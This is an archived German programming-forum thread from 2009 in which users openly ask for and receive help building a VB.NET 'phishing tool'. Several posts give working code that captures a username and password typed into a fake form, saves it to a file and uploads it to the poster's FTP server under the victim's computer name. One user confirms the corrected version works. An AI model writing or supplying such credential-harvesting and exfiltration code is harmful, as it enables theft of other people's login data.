PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Hilfe FTP Upload Selber Ordner



NavanBethrax
21.07.2009, 05:23
Wie würde der string für ein Phishingtool lauten das
die datei User.ini aus dem Selben Ordner wie das Phishingtool
hochläd.

Mein problem ist ja das der Ordner Variiert

Ich hab einfach nur :

My.Computer.Network.UploadFile("User.ini", "ftp://mein_ftp_server.de", "mein_Login", "mein_Password")

das geht ja net ...

Und wie mache ich das die daten immer nache dem name des PC 's umbenannt werden das sie sich nicht immer Überschreiben ???

MfG NavanBethrax

HiddenFace
21.07.2009, 05:50
sry gehört grad nich zum thread aber sonst werd ich noch verrückt ich glaube du kannst mein prob lösen da du mehr plan hast als ich ^^ ich möchte auch ein hishing tool basteln ich bräuchte einen source dazu aber ich fine nur schrott ich möchte später gerne 2textboxen + 1 button haben und das was in den text boxen steht sollte er in 1 txt auf meinen ftp server uploaden am besten jede LOG wie der Computer heist aber da hängst bei dir ja auch noch vllt finde ich das ja noch raus.. wäre cool wenn du mir weter helfen könntest

Mfg

EDIT:
achja der source sollte für VB.net funzen :D

NavanBethrax
21.07.2009, 06:17
Genau so isses bei mir ja auch einfaches Phishing tool mit eigenem aussehen ^-^ das war auch deine idee oda ???

Ich hab nen script :


Private Sub SpeicherButton_Click() Handles Button1.Click




Dim W As New System.IO.StreamWriter("User.ini", True)
W.WriteLine("Username: " & TextBox1.Text & " & " & "Passwort: " & TextBox2.Text)
W.Close()
My.Computer.Network.UploadFile("User.ini", "Mein_Ftp_Server", "Name", "Password")

Sawyer
21.07.2009, 06:18
@NavanBethrax


Wie würde der string für ein Phishingtool lauten das
die datei User.ini aus dem Selben Ordner wie das Phishingtool
hochläd.

Mein problem ist ja das der Ordner Variiert


Und wie mache ich das die daten immer nache dem name des PC 's umbenannt werden das sie sich nicht immer Überschreiben ???


My.Computer.Network.UploadFile(Application.Executa blePath & "\User.ini", "ftp://mein_ftp_server.de" & "/" & "User.ini - " & My.Computer.Name.ToString(), "mein_Login", "mein_Password")

Nicht getestet , aber müsste so stimmen ;)


sry gehört grad nich zum thread aber sonst werd ich noch verrückt ich glaube du kannst mein prob lösen da du mehr plan hast als ich ^^ ich möchte auch ein hishing tool basteln ich bräuchte einen source dazu aber ich fine nur schrott ich möchte später gerne 2textboxen + 1 button haben und das was in den text boxen steht sollte er in 1 txt auf meinen ftp server uploaden am besten jede LOG wie der Computer heist aber da hängst bei dir ja auch noch vllt finde ich das ja noch raus.. wäre cool wenn du mir weter helfen könntest

2. Textbox (TextBox1 , TextBox2)
1. Button


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim sw As New System.IO.StreamWriter(Environment.GetEnvironmentV ariable("tmp") & "\Log.txt")
sw.WriteLine(TextBox1.Text & ControlChars.CrLf & TextBox2.Text)
sw.Flush()
sw.Close()

My.Computer.Network.UploadFile(Environment.GetEnvi ronmentVariable("tmp") & "\Log.txt", "ftp://meinftp.me.ohost.de/" & My.Computer.Name, "username", "passwort")
End Sub

NavanBethrax
21.07.2009, 06:33
Die Adresse für UploadFile muss einen Dateinamen enthalten.

>.< hab dein 2 Script genommen Papst

Sawyer
21.07.2009, 06:56
Die Adresse für UploadFile muss einen Dateinamen enthalten.

>.< hab dein 2 Script genommen Papst War eben noch in Linux , deshalb konnte ich es nicht testen , aber jetzt funktioniert der Code ;)


My.Computer.Network.UploadFile(My.Application.Info .DirectoryPath & "\User.ini", "ftp://mein_ftp_server.de" & "/" & "User.ini - " & My.Computer.Name, "username", "passwort")MfG

NavanBethrax
21.07.2009, 07:34
Thx Papst ^^

krusty
21.07.2009, 10:40
pass auf, mit dem my.computer.name und my.usern.name
ich habe da totale probleme bekommen, weil my.computer.name glaube ich so aussieht computername/username.
dann befand sich auf meinem ftp ne datei namens computername/username, die ich nicht mehr löschen konnte ^^
filezilla hat rumgemäckert, weil es dachte computername/username wäre ein unterordner...

Sawyer
21.07.2009, 11:14
ich habe da totale probleme bekommen, weil my.computer.name glaube ich so aussieht computername/username.

Gibt nur den PC Namen aus , nicht aber den Benutzernamen , da bin ich mir sicher , weil ich es selbst getestet habe ;)

MfG

krusty
21.07.2009, 12:48
dann war es enviroment.mashinname oder so oder mein rechner heisst einfach KRUSTY/Krusty kp ^^